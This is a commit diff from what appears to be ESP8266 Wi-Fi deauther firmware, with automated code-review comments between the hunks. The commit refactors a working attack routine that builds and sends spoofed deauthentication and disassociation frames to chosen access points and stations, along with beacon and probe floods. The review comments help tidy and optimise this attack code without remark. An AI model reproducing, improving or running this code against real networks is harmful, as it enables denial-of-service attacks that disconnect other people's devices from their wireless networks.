Improved attack routine

- fewer count() calls
- fixed the deauth station crash (hopefully)
- sort targets after channel for better performance
- increment counter in deauth/beacon/probe function and not in sendPacket() that was stupid anyway
This commit is contained in:
Stefan Kremser
2018-03-25 10:26:55 +02:00
parent 7d26b0741f
commit e494d95c15
5 changed files with 82 additions and 44 deletions


@@ -23,7 +23,8 @@ void Attack::start() {
prntln(A_START); prntln(A_START);
attackTime = currentTime; attackTime = currentTime;
attackStartTime = currentTime; attackStartTime = currentTime;
//accesspoints.sortAfterChannel(); accesspoints.sortAfterChannel();
stations.sortAfterChannel();
running = true; running = true;
} }
@@ -41,6 +42,8 @@ void Attack::start(bool beacon, bool deauth, bool deauthAll, bool probe, bool ou
start(); start();
} else { } else {
prntln(A_NO_MODE_ERROR); prntln(A_NO_MODE_ERROR);
accesspoints.sort();
stations.sort();
stop(); stop();
} }
} }
@@ -131,6 +134,10 @@ String Attack::getStatusJSON() {
void Attack::update() { void Attack::update() {
if (!running || scan.isScanning()) return; if (!running || scan.isScanning()) return;
apCount = accesspoints.count();
stCount = stations.count();
nCount = names.count();
// run/update all attacks // run/update all attacks
deauthUpdate(); deauthUpdate();
deauthAllUpdate(); deauthAllUpdate();
@@ -150,28 +157,28 @@ void Attack::deauthUpdate() {
if (!deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) { if (!deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) { if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
// APs // APs
if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) { if (apCount > 0 && deauth.tc < apCount) {
if (accesspoints.getSelected(deauth.tc)) { if (accesspoints.getSelected(deauth.tc)) {
deauth.tc += deauthAP(deauth.tc); deauth.tc += deauthAP(deauth.tc);
} else deauth.tc++; } else deauth.tc++;
} }
// Stations // Stations
else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) { else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
if (stations.getSelected(deauth.tc - accesspoints.count())) { if (stations.getSelected(deauth.tc - apCount)) {
deauth.tc += deauthStation(deauth.tc - accesspoints.count()); deauth.tc += deauthStation(deauth.tc - apCount);
} else deauth.tc++; } else deauth.tc++;
} }
// Names // Names
else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < names.count() + stations.count() + accesspoints.count()) { else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < nCount + stCount + apCount) {
if (names.getSelected(deauth.tc - stations.count() - accesspoints.count())) { if (names.getSelected(deauth.tc - stCount - apCount)) {
deauth.tc += deauthName(deauth.tc - stations.count() - accesspoints.count()); deauth.tc += deauthName(deauth.tc - stCount - apCount);
} else deauth.tc++; } else deauth.tc++;
} }
// reset counter // reset counter
if (deauth.tc >= names.count() + stations.count() + accesspoints.count()) if (deauth.tc >= nCount + stCount + apCount)
deauth.tc = 0; deauth.tc = 0;
} }
} }
@@ -181,7 +188,7 @@ void Attack::deauthAllUpdate() {
if (deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) { if (deauthAll && deauth.active && deauth.maxPkts > 0 && deauth.packetCounter < deauth.maxPkts) {
if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) { if (deauth.time <= currentTime - (1000 / deauth.maxPkts)) {
// APs // APs
if (accesspoints.count() > 0 && deauth.tc < accesspoints.count()) { if (apCount > 0 && deauth.tc < apCount) {
tmpID = names.findID(accesspoints.getMac(deauth.tc)); tmpID = names.findID(accesspoints.getMac(deauth.tc));
if (tmpID < 0) { if (tmpID < 0) {
deauth.tc += deauthAP(deauth.tc); deauth.tc += deauthAP(deauth.tc);
@@ -191,24 +198,24 @@ void Attack::deauthAllUpdate() {
} }
// Stations // Stations
else if (stations.count() > 0 && deauth.tc >= accesspoints.count() && deauth.tc < stations.count() + accesspoints.count()) { else if (stCount > 0 && deauth.tc >= apCount && deauth.tc < stCount + apCount) {
tmpID = names.findID(stations.getMac(deauth.tc - accesspoints.count())); tmpID = names.findID(stations.getMac(deauth.tc - apCount));
if (tmpID < 0) { if (tmpID < 0) {
deauth.tc += deauthStation(deauth.tc - accesspoints.count()); deauth.tc += deauthStation(deauth.tc - apCount);
} else if (!names.getSelected(tmpID)) { } else if (!names.getSelected(tmpID)) {
deauth.tc += deauthStation(deauth.tc - accesspoints.count()); deauth.tc += deauthStation(deauth.tc - apCount);
} else deauth.tc++; } else deauth.tc++;
} }
// Names // Names
else if (names.count() > 0 && deauth.tc >= accesspoints.count() + stations.count() && deauth.tc < accesspoints.count() + stations.count() + names.count()) { else if (nCount > 0 && deauth.tc >= apCount + stCount && deauth.tc < apCount + stCount + nCount) {
if (!names.getSelected(deauth.tc - accesspoints.count() - stations.count())) { if (!names.getSelected(deauth.tc - apCount - stCount)) {
deauth.tc += deauthName(deauth.tc - accesspoints.count() - stations.count()); deauth.tc += deauthName(deauth.tc - apCount - stCount);
} else deauth.tc++; } else deauth.tc++;
} }
// reset counter // reset counter
if (deauth.tc >= names.count() + stations.count() + accesspoints.count()) if (deauth.tc >= nCount + stCount + apCount)
deauth.tc = 0; deauth.tc = 0;
} }
} }
@@ -233,15 +240,15 @@ void Attack:: beaconUpdate() {
} }
} }
bool Attack::deauthStation(uint8_t num) { bool Attack::deauthStation(int num) {
return deauthDevice(accesspoints.getMac(stations.getAP(num)), stations.getMac(num), settings.getDeauthReason(), accesspoints.getCh(stations.getAP(num))); return deauthDevice(accesspoints.getMac(stations.getAP(num)), stations.getMac(num), settings.getDeauthReason(), accesspoints.getCh(stations.getAP(num)));
} }
bool Attack::deauthAP(uint8_t num) { bool Attack::deauthAP(int num) {
return deauthDevice(accesspoints.getMac(num), broadcast, settings.getDeauthReason(), accesspoints.getCh(num)); return deauthDevice(accesspoints.getMac(num), broadcast, settings.getDeauthReason(), accesspoints.getCh(num));
} }
bool Attack::deauthName(uint8_t num) { bool Attack::deauthName(int num) {
if (names.isStation(num)) { if (names.isStation(num)) {
return deauthDevice(names.getBssid(num), names.getMac(num), settings.getDeauthReason(), names.getCh(num)); return deauthDevice(names.getBssid(num), names.getMac(num), settings.getDeauthReason(), names.getCh(num));
} else { } else {
@@ -265,22 +272,36 @@ bool Attack::deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_
// send deauth frame // send deauth frame
deauthPacket[0] = 0xc0; deauthPacket[0] = 0xc0;
if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets())) if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true; success = true;
// send disassociate frame // send disassociate frame
deauthPacket[0] = 0xa0; deauthPacket[0] = 0xa0;
if (sendPacket(deauthPacket, packetSize, &deauth.packetCounter, ch, settings.getForcePackets())) if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true; success = true;
// send another packet, this time from the station to the accesspoint // send another packet, this time from the station to the accesspoint
if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast if (!macBroadcast(stMac)) { // but only if the packet isn't a broadcast
if (deauthDevice(stMac, apMac, reason, ch)) { // build deauth packet
memcpy(&deauthPacket[4], apMac, 6);
memcpy(&deauthPacket[10], stMac, 6);
memcpy(&deauthPacket[16], stMac, 6);
// send deauth frame
deauthPacket[0] = 0xc0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true;
// send disassociate frame
deauthPacket[0] = 0xa0;
if (sendPacket(deauthPacket, packetSize, ch, settings.getForcePackets()))
success = true; success = true;
}
} }
if (success) deauth.time = currentTime; if (success){
deauth.time = currentTime;
deauth.packetCounter++;
}
return success; return success;
} }
@@ -310,8 +331,9 @@ bool Attack::sendBeacon(uint8_t* mac, const char* ssid, uint8_t ch, bool wpa2) {
beaconPacket[82] = ch; beaconPacket[82] = ch;
if (sendPacket(beaconPacket, packetSize, &beacon.packetCounter, ch, settings.getForcePackets())) { if (sendPacket(beaconPacket, packetSize, ch, settings.getForcePackets())) {
beacon.time = currentTime; beacon.time = currentTime;
beacon.packetCounter++;
return true; return true;
} }
@@ -332,15 +354,16 @@ bool Attack::sendProbe(uint8_t* mac, const char* ssid, uint8_t ch) {
memcpy(&probePacket[10], mac, 6); memcpy(&probePacket[10], mac, 6);
memcpy(&probePacket[26], ssid, ssidLen); memcpy(&probePacket[26], ssid, ssidLen);
if (sendPacket(probePacket, packetSize, &probe.packetCounter, ch, settings.getForcePackets())) { if (sendPacket(probePacket, packetSize, ch, settings.getForcePackets())) {
probe.time = currentTime; probe.time = currentTime;
probe.packetCounter++;
return true; return true;
} }
return false; return false;
} }
bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries) { bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries) {
//Serial.println(bytesToStr(packet, packetSize)); //Serial.println(bytesToStr(packet, packetSize));
// set channel // set channel
@@ -351,11 +374,9 @@ bool Attack::sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCo
// try again until it's sent out // try again until it's sent out
for (int i = 0; i < tries && !sent; i++) { for (int i = 0; i < tries && !sent; i++) {
yield();
sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0; sent = wifi_send_pkt_freedom(packet, packetSize, 0) == 0;
} }
if (sent) (*packetCounter)++;
return sent; return sent;
} }
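Review bot: In the deauthDevice hunk, `deauth.packetCounter++` now runs once per call, although the body issues up to four `sendPacket` calls (deauth and disassociate forward, then the same pair in the reverse direction when `stMac` is not broadcast), so the counter no longer counts transmitted frames but calls that had at least one success; `deauthUpdate()` compares this very counter against `deauth.maxPkts`, so its meaning changed with it. A comment at the increment, `// one per deauthDevice() call (2–4 frames), not per frame; deauthUpdate() compares this with maxPkts`, would make that visible to the next reader. The reverse-direction block (`memcpy` through the second `sendPacket`) repeats the forward block line for line now that the recursive call is gone; at least a `// same two frames, station -> accesspoint direction` comment at its top would say why the code appears twice. deauthDevice starts before this hunk, so the forward `memcpy` build is not visible here.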


@@ -42,9 +42,9 @@ class Attack {
void status(); void status();
String getStatusJSON(); String getStatusJSON();
bool deauthAP(uint8_t num); bool deauthAP(int num);
bool deauthStation(uint8_t num); bool deauthStation(int num);
bool deauthName(uint8_t num); bool deauthName(int num);
bool deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch); bool deauthDevice(uint8_t* apMac, uint8_t* stMac, uint8_t reason, uint8_t ch);
bool sendBeacon(uint8_t tc); bool sendBeacon(uint8_t tc);
@@ -53,7 +53,7 @@ class Attack {
bool sendProbe(uint8_t tc); bool sendProbe(uint8_t tc);
bool sendProbe(uint8_t* mac, const char* ssid, uint8_t ch); bool sendProbe(uint8_t* mac, const char* ssid, uint8_t ch);
bool sendPacket(uint8_t* packet, uint16_t packetSize, uint16_t* packetCounter, uint8_t ch, uint16_t tries); bool sendPacket(uint8_t* packet, uint16_t packetSize, uint8_t ch, uint16_t tries);
bool isRunning(); bool isRunning();
@@ -91,12 +91,16 @@ class Attack {
uint32_t beaconPkts = 0; uint32_t beaconPkts = 0;
uint32_t probePkts = 0; uint32_t probePkts = 0;
int8_t tmpID; uint8_t apCount = 0;
uint8_t stCount = 0;
uint8_t nCount = 0;
int8_t tmpID = -1;
uint16_t packetSize = 0; uint16_t packetSize = 0;
uint32_t attackTime = 0; // for counting how many packets per second uint32_t attackTime = 0; // for counting how many packets per second
uint32_t attackStartTime = 0; uint32_t attackStartTime = 0;
uint32_t timeout; uint32_t timeout = 0;
// random mac address for making the beacon packets // random mac address for making the beacon packets
uint8_t mac[6] = {0xAA,0xBB,0xCC,0x00,0x11,0x22}; uint8_t mac[6] = {0xAA,0xBB,0xCC,0x00,0x11,0x22};
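Review bot: The new `apCount`, `stCount` and `nCount` members are `uint8_t`, while the same commit changes `deauthAP`/`deauthStation`/`deauthName` to take `int num` and the cached values are summed (`nCount + stCount + apCount`) and compared with `deauth.tc` in Attack.cpp; the return type of `count()` is not visible in this diff, and if it is wider than 8 bits the cache silently narrows. Declaring the three with the type `count()` returns (or `int`, matching the new parameter type) keeps the arithmetic consistent. A one-line comment, `// list sizes cached once per Attack::update() instead of calling count() repeatedly`, would also explain why they are members rather than locals.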


@@ -889,8 +889,12 @@ void SerialInterface::runCommand(String input) {
for (int i = 0; i < packetSize; i++) for (int i = 0; i < packetSize; i++)
packet[i] = strtoul((packetStr.substring(i * 2, i * 2 + 2)).c_str(), NULL, 16); packet[i] = strtoul((packetStr.substring(i * 2, i * 2 + 2)).c_str(), NULL, 16);
if (attack.sendPacket(packet, packetSize, &counter, wifi_channel, 10)) prntln(CLI_CUSTOM_SENT); if (attack.sendPacket(packet, packetSize, wifi_channel, 10)){
else prntln(CLI_CUSTOM_FAILED); prntln(CLI_CUSTOM_SENT);
counter++;
} else{
prntln(CLI_CUSTOM_FAILED);
}
} }
// ===== LED ===== // // ===== LED ===== //
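Review bot: `counter++` in the new success branch updates a local whose declaration and any later read are outside this hunk; if `counter` existed only to be passed as `&counter` to the old `sendPacket` signature, it is now write-only and the variable and the increment can both go. If it is still read after this block, keep it, but a short comment such as `// counter is reported/used below` would stop the next reader from asking the same question. The `} else{` spacing also differs from the `} else {` form used in the Attack.cpp hunks of this commit. The enclosing `runCommand` body starts and ends outside the hunk.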


@@ -35,6 +35,14 @@ void Stations::sort() {
}); });
} }
void Stations::sortAfterChannel() {
list->sort([](Station & a, Station & b) -> int{
if (a.ch == b.ch) return 0;
if (a.ch < b.ch) return -1;
if (a.ch > b.ch) return 1;
});
}
void Stations::removeAll() { void Stations::removeAll() {
internal_removeAll(); internal_removeAll();
prntln(ST_CLEARED_LIST); prntln(ST_CLEARED_LIST);
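Review bot: The comparator lambda in `sortAfterChannel()` is declared `-> int` but has no return after the three `if`s, so the compiler sees a path that falls off the end of a non-void function (a `-Wreturn-type` warning, and undefined behaviour should it ever be reached). `return (a.ch > b.ch) - (a.ch < b.ch);` covers all three cases in one expression and removes the open path. A one-line comment on the method, `// orders the list by channel, ascending; distinct from sort()`, would document why it exists next to `sort()`.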


@@ -27,6 +27,7 @@ class Stations {
Stations(); Stations();
void sort(); void sort();
void sortAfterChannel();
void select(int num); void select(int num);
void deselect(int num); void deselect(int num);
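Review bot: `sortAfterChannel()` is declared without a comment distinguishing it from `sort()` on the line above. From the Stations.cpp hunk it orders entries by `ch` ascending, so `void sortAfterChannel(); // order by channel, ascending` tells a header reader what to expect without opening the source file.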